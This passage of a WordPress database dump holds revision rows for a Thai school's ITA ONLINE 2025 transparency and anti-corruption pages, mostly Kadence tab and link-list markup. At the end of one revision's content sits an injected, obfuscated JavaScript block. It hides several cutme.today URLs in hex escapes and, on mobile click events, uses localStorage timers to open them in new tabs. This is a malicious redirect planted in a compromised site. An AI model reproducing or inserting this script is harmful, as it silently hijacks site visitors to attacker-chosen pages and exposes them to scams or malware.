data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-05-21 12:03:20','2025-05-21 05:03:20','',871,'http://pakhaeng.ssk.in.th/?p=1262',0,'revision','',0),
(1264,1,'2025-05-21 12:09:55','2025-05-21 05:09:55','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items 